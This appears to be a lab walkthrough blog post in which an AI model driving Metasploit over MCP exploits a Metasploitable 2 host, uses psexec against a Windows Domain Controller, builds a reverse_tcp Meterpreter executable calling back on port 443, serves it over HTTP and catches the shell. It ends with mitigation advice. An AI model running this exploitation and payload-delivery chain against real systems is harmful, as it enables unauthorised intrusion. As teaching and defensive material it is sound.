AI-Powered Penetration Testing with Metasploit

June 6, 2026 / July 17, 2026 by raj

Overview

This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks into real offensive actions. The assistant scans the network, selects and launches exploit modules, manages sessions, runs post-exploitation, and even builds and delivers a custom payload — first compromising a vulnerable Linux host and then pivoting to a Windows Domain Controller. Metasploit performs the work; a permission gate keeps a human in control of every offensive step; and every action targets a private, isolated lab the author owns.

The walkthrough proceeds in three movements: building the MCP bridge, compromising the Linux target, and pivoting to the Domain Controller. It closes with concrete mitigation strategies and a forward-looking conclusion on what agentic tooling means for both offence and defence.

Introduction
Lab Environment
Building the Metasploit MCP Bridge
Installing the Metasploit MCP Server
Starting PostgreSQL and the MSF RPC Daemon
Installing Claude Desktop on Kali Linux
Opening Claude Desktop Settings
Locating the Local MCP Server Panel
Locating the Configuration File
Reviewing the Default Configuration
Referencing the MetasploitMCP Template
Registering the Metasploit Server
Confirming the Server Is Running
Scenario 1
- Compromising the Linux Target
- Tasking Claude to Scan the Target
- Initial Port Discovery
- The Complete Port Map
- Exploiting the vsftpd Backdoor
- Gaining a Root Shell
- Listing the Active Session
- Post-Exploitation: Enumerating SMB Shares
- Chaining a Second Exploit: UnrealIRCd
- Pivoting to the Domain Controller
- Consolidating the Foothold
- Reviewing the Metasploit Toolset
Scenario 2
- Scanning the Domain Controller
- Surveying SMB Exploits
- Supplying the Target
- Supplying SMB Credentials
- Gaining a SYSTEM Session
- Confirming SYSTEM on the DC
- Surveying Post-Exploitation Modules
- Enumerating Domain Controller Shares
Scenario 3
- Generate Payload
- Choosing the Output Format
- Setting the Listener Host
- Setting the Listener Port
- Generating the Payload
- Hosting the Payload
- Starting the Handler
- List Active Sessions
Mitigation Strategies
Conclusion

Introduction

The Model Context Protocol lets Claude Desktop reach beyond conversation and call external tools directly. Pointed at a Metasploit MCP server, the assistant becomes an operator’s force multiplier: it interprets terse instructions, recalls exact module syntax, chains steps, and reports results in context, removing much of the friction that normally slows an engagement.

This piece demonstrates that workflow in full. Rather than typing Metasploit commands by hand, the operator issues goals such as “scan 192.168.1.8” or “exploit port 21,” and the assistant proposes and executes the corresponding actions. The result is a vivid look at how natural-language interfaces are reshaping practical security testing. Because these techniques grant real control over real systems, they must only ever run against assets you are explicitly authorised to test.

Lab Environment

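The engagement unfolds on a single isolated segment, 192.168.1.0/24, built in VMware. A Kali Linux machine serves as the attacker and hosts both Claude Desktop and the Metasploit Framework. Two victims complete the picture: an intentionally vulnerable Metasploitable 2 Linux box and a Windows Server 2019 Active Directory Domain Controller. The hosts and their roles are summarised below.

- Kali Linux, 192.168.1.17: attacker, running Claude Desktop and the Metasploit Framework
- Metasploitable 2, 192.168.1.8: intentionally vulnerable Linux target
- Windows Server 2019, 192.168.1.11: Active Directory Domain Controller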

Architecturally, Claude Desktop communicates with msfrpcd via the MCP bridge, and Metasploit reaches the targets across the lab segment. Nothing in this environment is connected to a production network.

Building the Metasploit MCP Bridge

Before any offensive action, we connect the assistant to Metasploit. The following steps install the bridge, start the framework’s services, deploy Claude Desktop, and register the server.

Installing the Metasploit MCP Server

We will first install the bridge that exposes Metasploit’s RPC interface as MCP tools such as run_exploit, run_post_module, and list_active_sessions.

sudo apt install metasploitmcp

Starting PostgreSQL and the MSF RPC Daemon

Metasploit relies on PostgreSQL, and the bridge communicates through msfrpcd. We start the database, then launch the RPC daemon bound to localhost; it backgrounds itself and reports a live PID.

sudo service postgresql start
msfrpcd -P <msf-password> -S -a 127.0.0.1 -p 55553
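Before wiring up the bridge, it can help to confirm that the daemon is actually accepting connections. The following is a minimal sketch of a plain TCP reachability check. The helper name is_port_open is illustrative, and the host and port simply mirror the -a and -p values passed to msfrpcd above. It only tests that the port answers; it does not authenticate to the RPC service.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


if __name__ == "__main__":
    # 127.0.0.1:55553 mirrors the msfrpcd command in this section.
    state = "listening" if is_port_open("127.0.0.1", 55553) else "not reachable"
    print(f"msfrpcd on 127.0.0.1:55553 is {state}")
```

If the check reports that the port is not reachable, the usual suspects are a daemon that failed to start or a different bind address or port.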

Installing Claude Desktop on Kali Linux

Kali Linux is Debian-based, so an amd64 Debian package is appropriate for a standard 64-bit Intel/AMD Kali installation. From the release Assets section, download the amd64 .deb package shown in the screenshot.

claude-desktop_1.21459.0_amd64.deb

Open a terminal and move to the directory containing the downloaded Debian package. If the browser saved the file in Downloads, run:

cd Downloads

Install the package with dpkg, using the exact filename of the package you downloaded:

sudo dpkg -i claude-desktop-unofficial_1.21459.0-3.2.1_amd64.deb

The installation process unpacks the package, configures Claude Desktop, updates the desktop database, and sets the required chrome-sandbox permissions. A successful installation returns you to the terminal prompt without a fatal error.

Opening Claude Desktop Settings

After launching the client, we open the account menu and select Settings to reach the configuration panels.

Locating the Local MCP Server Panel

In Settings, we open the Developer tab to access Local MCP servers, then click Edit Config to open the JSON file that defines them.

Locating the Configuration File

Edit Config points to claude_desktop_config.json in the Claude profile directory, which we open in a text editor.

~/.config/Claude/claude_desktop_config.json

Reviewing the Default Configuration

The file initially holds only client preferences — note the remoteToolsDeviceName “kali”. We will add an mcpServers block alongside these settings.

Referencing the MetasploitMCP Template

The MetasploitMCP project page supplies a template mcpServers block specifying the command, arguments, and an MSF_PASSWORD variable, which we adapt to our installation.

Registering the Metasploit Server

We edit the configuration: the command becomes metasploitmcp, the transport is stdio, and MSF_PASSWORD carries the same password given to msfrpcd.

{
  "mcpServers": {
    "metasploit": {
      "command": "metasploitmcp",
      "args": [
        "--transport",
        "stdio"
      ],
      "env": {
        "MSF_PASSWORD": "<msf-password>"
      }
    }
  }
}
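Because the file already holds client preferences, the new block has to be merged in rather than pasted over them. The sketch below shows one way to do that in Python. The helper name add_mcp_server is hypothetical, the stand-in for the existing file contains only the remoteToolsDeviceName key mentioned earlier (its exact position in the real file is an assumption), and reading the password from an environment variable is a suggestion rather than something the MetasploitMCP project prescribes.

```python
import json
import os


def add_mcp_server(config: dict, name: str, command: str, args: list, env: dict) -> dict:
    """Return a copy of config with one entry added under "mcpServers"."""
    merged = dict(config)  # existing client preferences are carried over
    servers = dict(merged.get("mcpServers", {}))
    servers[name] = {"command": command, "args": list(args), "env": dict(env)}
    merged["mcpServers"] = servers
    return merged


if __name__ == "__main__":
    # Stand-in for the existing file contents (assumed shape).
    existing = {"remoteToolsDeviceName": "kali"}
    updated = add_mcp_server(
        existing,
        name="metasploit",
        command="metasploitmcp",
        args=["--transport", "stdio"],
        # Falls back to a placeholder when MSF_PASSWORD is not set in the shell.
        env={"MSF_PASSWORD": os.environ.get("MSF_PASSWORD", "<msf-password>")},
    )
    print(json.dumps(updated, indent=2))
```

The function returns a new dictionary and leaves its input untouched, so the original settings can be kept as a backup before anything is written to disk.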

Confirming the Server Is Running

Back in Settings, the Local MCP servers panel lists Metasploit with a green running badge — the bridge is live, and the Metasploit tools are now available to the assistant.

Scenario 1

Compromising the Linux Target

With the bridge live, we turn the assistant on the Metasploitable 2 host at 192.168.1.8, moving from reconnaissance to a root shell using only plain-language tasks.

Tasking Claude to Scan the Target

We issue a deliberately terse task — no flags, no module names. The assistant must work out the method itself.

scan 192.168.1.8

Initial Port Discovery

Claude reasons about its constraints — the sandbox lacks raw-socket Nmap — proposes alternatives, runs a scan through the connector, and returns the first open ports: FTP, SSH, Telnet, SMTP, HTTP, SMB, MySQL, and VNC.

The Complete Port Map

Asked for a full scan, the assistant returns all 31 open ports and annotates them with security context — flagging vsftpd 2.3.4, the Samba usermap_script weakness, distccd RCE, the ingreslock backdoor, and an UnrealIRCd backdoor.

complete port scan

Exploiting the vsftpd Backdoor

We escalate from looking to acting. Claude maps the request to the module unix/ftp/vsftpd_234_backdoor, sets RHOSTS, and requests run_exploit. A permission gate halts execution until a human explicitly approves.

exploit port 21
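The permission gate is the control that matters most here, so it is worth sketching the idea in code. The following is not how Claude Desktop implements its gate; it is a minimal illustration of the pattern, assuming a hypothetical set of gated tool names (borrowed from the tools this article mentions) and caller-supplied approve and execute callables.

```python
from typing import Any, Callable, Dict

# Hypothetical list of tools treated as offensive; names follow the article.
GATED_TOOLS = {"run_exploit", "run_post_module", "start_listener"}


def gated_call(
    tool: str,
    params: Dict[str, Any],
    approve: Callable[[str, Dict[str, Any]], bool],
    execute: Callable[[str, Dict[str, Any]], Any],
) -> Any:
    """Run execute(tool, params) only if the tool is ungated or a human approves."""
    if tool in GATED_TOOLS and not approve(tool, params):
        raise PermissionError(f"{tool} was not approved")
    return execute(tool, params)


def ask_on_console(tool: str, params: Dict[str, Any]) -> bool:
    """Prompt the operator; anything other than an explicit 'yes' is a refusal."""
    answer = input(f"Allow {tool} with {params}? [yes/no] ")
    return answer.strip().lower() == "yes"
```

The design choice worth noting is the default: a missing or ambiguous answer counts as a refusal, so nothing offensive runs unless a person explicitly says yes.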

Gaining a Root Shell

On approval, the backdoor triggers and a Meterpreter session opens as root on metasploitable.localdomain, tunnelled from Kali at 192.168.1.17.

Listing the Active Session

We confirm the foothold. The list_active_sessions tool reports one live root Meterpreter session, ready for post-exploitation.

list_active_sessions

Post-Exploitation: Enumerating SMB Shares

Claude runs an SMB auxiliary module, correctly recognising smb_enumshares as an auxiliary rather than a post module, and returns the share list, including a world-writable tmp share. It also notes that Samba 3.0.20 is vulnerable to usermap_script (CVE-2007-2447).

run_post_module scanner/smb/smb_enumshares

Chaining a Second Exploit: UnrealIRCd

Directed at another flagged service, the assistant launches unix/irc/unreal_ircd_3281_backdoor and creates a second session — demonstrating multi-exploit chaining — while candidly noting a session-persistence quirk in the RPC layer.

run exploit on port 6667

Pivoting to the Domain Controller

With the Linux host owned, we turn to the prize of the lab — the Windows Domain Controller at 192.168.1.11 — and drive the assistant from reconnaissance to a standing SYSTEM session.

Consolidating the Foothold

We begin by confirming our two existing footholds on the Linux host: a root Meterpreter session via vsftpd and a command shell via UnrealIRCd — a stable base from which to pivot.

list_active_sessions

Reviewing the Metasploit Toolset

We ask the assistant to enumerate every Metasploit action exposed over MCP. The reference spans the full lifecycle — list_exploits, run_exploit, run_post_module, generate_payload, start_listener, and session management.

all commands

Scenario 2

Scanning the Domain Controller

Pointed at 192.168.1.11, the assistant returns the open ports and classifies them: Kerberos (88, 464), LDAP (389, 636), SMB (445), DNS (53), and RPC — the classic signature of a Windows Domain Controller.

port scan 192.168.1.11
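The classification step is essentially a lookup plus a heuristic, which the sketch below makes explicit. The port-to-role table follows the list in the text; port 135 for RPC and the choice of Kerberos, LDAP, and SMB together as the deciding signal are assumptions made for illustration, not the assistant's actual logic.

```python
# Roles as classified in the text; 135 for RPC is an assumption.
DC_PORTS = {
    53: "DNS",
    88: "Kerberos",
    135: "RPC",
    389: "LDAP",
    445: "SMB",
    464: "Kerberos password change",
    636: "LDAPS",
}

# Heuristic (assumed): these three together suggest a Domain Controller.
REQUIRED = {88, 389, 445}


def classify_ports(open_ports):
    """Return (labels, looks_like_dc) for an iterable of open TCP port numbers."""
    found = set(open_ports)
    labels = {p: DC_PORTS[p] for p in sorted(found) if p in DC_PORTS}
    return labels, REQUIRED.issubset(found)
```

A file server exposing only SMB would be labelled but not flagged as a Domain Controller, which is the distinction the assistant draws in its summary.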

Surveying SMB Exploits

Asked for SMB exploits on port 445, the assistant lists EternalBlue, MS08-067, SMBGhost, and others, and flags credential-based windows/smb/psexec as the clean path — because we already hold valid administrator credentials for this lab.

list_exploits windows port 445

Supplying the Target

The assistant gathers parameters interactively rather than guessing. It first asks for RHOSTS; we select the Domain Controller at 192.168.1.11.

RHOSTS → 192.168.1.11.

Supplying SMB Credentials

Because psexec authenticates rather than exploits a memory bug, it needs a valid account. We provide the known lab administrator credentials via the free-text option.

SMBUser: administrator
SMBPass: <lab-password>

Gaining a SYSTEM Session

The assistant runs psexec, and a session opens: a windows/meterpreter/reverse_tcp payload running on the Domain Controller.

Confirming SYSTEM on the DC

Running sysinfo confirms that the machine is named DC, and the session runs as NT AUTHORITY\SYSTEM, the highest privilege on the host.

sysinfo

Surveying Post-Exploitation Modules

We ask which post modules are worth running. The assistant groups the most useful Windows modules by purpose: gather/recon (hashdump, enum_shares, credential_collector), privilege escalation, and persistence.

list post module

Enumerating Domain Controller Shares

When a post module needs a session that has since dropped, the assistant explains the timeout and offers the exact console sequence to re-establish it — a transparent fallback that keeps the operator in control.

run post/windows/gather/enum_shares

An SMB share enumeration returns ADMIN$, C$, IPC$, and the tell-tale NETLOGON and SYSVOL, confirming a standard, clean Domain Controller.

Scenario 3

Generate Payload

Beyond live exploitation, the assistant can build a standalone payload. We invoke generate_payload and select windows/meterpreter/reverse_tcp.

Choosing the Output Format

Asked for the output format (exe, ps1, dll, or raw), we choose a standalone Windows executable.

Selection: exe

Setting the Listener Host

A reverse payload must know where to call back. The assistant prompts for LHOST; we supply the Kali address 192.168.1.17.

Selection: LHOST → 192.168.1.17.

Setting the Listener Port

For LPORT we choose 443 — a port that blends with HTTPS and is rarely blocked outbound.

Selection: LPORT → 443.

Generating the Payload

The assistant produces the executable and reports the result: a 7,168-byte file under /home/kali/payloads/ with the embedded LHOST and LPORT, and a reminder to start a listener first.

Hosting the Payload

To deliver the file we drop to the Kali terminal, confirm the executable, and serve it over HTTP. The log line shows the Domain Controller at 192.168.1.11 downloading it.

cd payloads
ls -al
python3 -m http.server

Starting the Handler

Back in the assistant, we start the matching listener with start_listener. Claude requests the action — specifying the payload, lhost, and lport 443 — and the permission gate again requires explicit approval.

start_listener

List Active Sessions

When the delivered executable runs, it calls back and a fresh Meterpreter session appears — from 192.168.1.11 as IGNITE\administrator @ DC, over our 192.168.1.17:443 listener. The full chain, from scan to standing access, was driven entirely by conversation.

list_active_sessions

Mitigation Strategies

Every weakness exploited here is well understood and entirely defensible. The first line of defence is dealing with the legacy services that made these hosts exploitable in the first place. Software like vsftpd 2.3.4, UnrealIRCd, and Samba 3.0.x is long past end-of-life and should be patched or retired outright; any service that isn’t actively needed should be removed entirely. Backing this up with continuous vulnerability management ensures that known-bad versions are caught as they reappear, rather than lingering until an attacker finds them.
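Continuous vulnerability management boils down to repeatedly comparing what is installed against what is known to be bad. The sketch below shows that comparison on a toy scale. The known-bad table contains only the three versions named in this article, and the inventory format (host, product, version) is an assumption; a real programme would draw both from a scanner and a maintained feed.

```python
# Known-bad entries named in this article; a real feed would be far larger.
KNOWN_BAD = {
    ("vsftpd", "2.3.4"): "backdoored release",
    ("samba", "3.0.20"): "usermap_script (CVE-2007-2447)",
    ("unrealircd", "3.2.8.1"): "backdoored release",
}


def flag_inventory(inventory):
    """Yield (host, product, version, reason) for rows on the known-bad list."""
    for host, product, version in inventory:
        reason = KNOWN_BAD.get((product.lower(), version))
        if reason:
            yield host, product, version, reason
```

Run on a schedule against a fresh inventory, a check like this catches a known-bad version when it reappears, for example after a restore from an old image.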

Closely related is the problem of broad service exposure on the host. Reducing the attack surface means segmenting the network so that a single compromised machine can’t freely reach everything else, applying strict ingress and egress firewall rules, and closing every port that doesn’t serve a documented, justified purpose. A port that doesn’t need to be open is simply one less thing an attacker can probe.
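The rule that every open port needs a documented purpose can be checked mechanically. The following sketch compares observed open ports with a per-host allow-list; the function name audit_exposure and the dictionary shapes are illustrative assumptions, and a host with no allow-list entry is treated as having nothing approved.

```python
def audit_exposure(observed: dict, allowed: dict) -> dict:
    """Map each host to the sorted open ports that are missing from its allow-list."""
    findings = {}
    for host, ports in observed.items():
        extra = sorted(set(ports) - set(allowed.get(host, ())))
        if extra:
            findings[host] = extra
    return findings
```

Hosts whose exposure matches their allow-list are left out of the result, so an empty dictionary means there is nothing to explain.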

The most damaging step in the engagement was credential-based lateral movement to the domain controller via psexec, and the mitigations here centre on identity. Administrators should enforce strong, unique passwords and adopt a tiered-administration model so that high-privilege credentials are never exposed on lower-trust systems. Deploying LAPS to manage local administrator passwords and restricting which accounts are permitted to authenticate to domain controllers at all sharply limits how far stolen credentials can travel.

SMB weaknesses and exposed admin shares deserve their own attention. Requiring SMB signing, disabling the obsolete SMBv1 protocol, removing any world-writable shares, and applying least privilege to all share permissions together close off one of the most common avenues for both lateral movement and data access.

On the endpoint side, the goal is to disrupt payload delivery and reverse shells — for example, an EXE hosted over HTTP that calls back on port 443. Endpoint detection and response with behavioural analytics, application allow-listing and blocking of unsigned binaries all raise the cost of execution, while alerting on anomalous outbound connections (including traffic riding on 443, where malicious call-backs often hide in plain sight) helps catch what slips through.
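Alerting on anomalous outbound connections does not have to start with machine learning; an allow-list of expected destinations already catches the call-back shown in this article. The sketch below assumes connection records arrive as (source, destination, port) tuples and that allowed destinations are given as CIDR strings. Both shapes are illustrative, not the format of any particular product.

```python
import ipaddress


def flag_outbound(connections, allowed_destinations):
    """Return connections whose destination is outside every allowed network.

    connections: iterable of (src_ip, dst_ip, dst_port) tuples.
    allowed_destinations: iterable of CIDR strings, such as "10.0.0.0/24".
    """
    networks = [ipaddress.ip_network(cidr) for cidr in allowed_destinations]
    flagged = []
    for src, dst, port in connections:
        addr = ipaddress.ip_address(dst)
        if not any(addr in net for net in networks):
            flagged.append((src, dst, port))
    return flagged
```

The port is deliberately ignored when deciding what to flag: a Domain Controller opening a connection to an unexpected workstation is suspicious whether or not it uses 443.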

Finally, the engagement itself was driven by agentic tooling, and that capability cuts both ways. Defensively, organisations should keep a human in the loop as an approval gate rather than letting an agent act autonomously, log and audit every MCP tool call, and restrict which connectors are enabled in the first place. Agent output should be treated as untrusted by default — and, importantly, the same automation that powers offensive testing can be turned toward the blue team to drive detection engineering and continuous validation.
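Logging every MCP tool call is only useful if the log is safe to keep and easy to search. The sketch below builds one JSON line per call and redacts credential-like parameters before they are written. The record fields and the list of sensitive keys are assumptions chosen for illustration; they are not part of MCP or of the Metasploit bridge.

```python
import json
import time

# Assumed parameter names that should never reach the log (compared lower-case).
SENSITIVE_KEYS = {"password", "smbpass", "msf_password"}


def audit_record(tool: str, params: dict, approved: bool, now=None) -> str:
    """Return one JSON line describing a tool call, with secrets redacted."""
    safe = {
        key: "<redacted>" if key.lower() in SENSITIVE_KEYS else value
        for key, value in params.items()
    }
    record = {
        "ts": time.time() if now is None else now,
        "tool": tool,
        "params": safe,
        "approved": approved,
    }
    return json.dumps(record, sort_keys=True)
```

Recording the approval decision alongside the call keeps the human-in-the-loop control auditable: a reviewer can see what was requested and also who let it run.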

Layered together, these controls break the chain at multiple points: an attacker who cannot reach a vulnerable service, recover a privileged credential, move laterally unnoticed, or land a payload cannot reproduce the outcome shown here.

Conclusion

In a single connected workflow, an AI assistant moved from an empty prompt to a root shell on a Linux host and a SYSTEM session on a Domain Controller — scanning, exploiting, enumerating, and delivering a payload, all through natural language. Metasploit performed the exploitation; the assistant supplied the orchestration and recall; and a human approved every offensive step.

That balance is the real lesson. Agentic tooling compresses an entire engagement into a conversation and lowers the skill floor for offence — but the very same integration can also automate detection, validation, and reporting for defenders. The advantage will go to whoever adopts it more deliberately. Used responsibly, with authorisation and a human firmly in the loop, an assistant like this is a powerful ally; used carelessly, it is a warning. The choice, as always, rests with the operator.